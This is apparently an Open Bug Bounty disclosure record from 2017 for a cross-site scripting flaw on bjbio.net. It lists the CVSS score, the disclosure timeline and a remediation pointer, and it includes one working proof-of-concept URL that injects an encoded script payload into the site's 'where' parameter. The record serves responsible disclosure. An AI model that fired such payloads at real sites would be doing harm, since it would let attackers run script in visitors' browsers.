bjbio.net XSS vulnerability

2017-11-2202:54:00

deb_security

www.openbugbounty.org

Description	Value
Affected Website:	bjbio.net
Vulnerable Application:	Custom Code
Vulnerability Type:	XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:	6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:	OWASP XSS Prevention Cheat Sheet

http://www.bjbio.net/home/bbs.php?table=03_01&where;=%22%3E%3Csvg%3E%3Cscript%3E/%3C@/%3Eprompt(/OPENBUGBOUNTY/)%3C/script%3E

Description	Value
Vulnerability Reported:	22 November, 2017 02:54 GMT
Vulnerability Verified:	22 November, 2017 02:58 GMT
Website Operator Notified:	22 November, 2017 02:58 GMT
Vulnerability Published:	22 November, 2017 02:58 GMT[without any technical details]
Public Disclosure:	20 February, 2018 02:54 GMT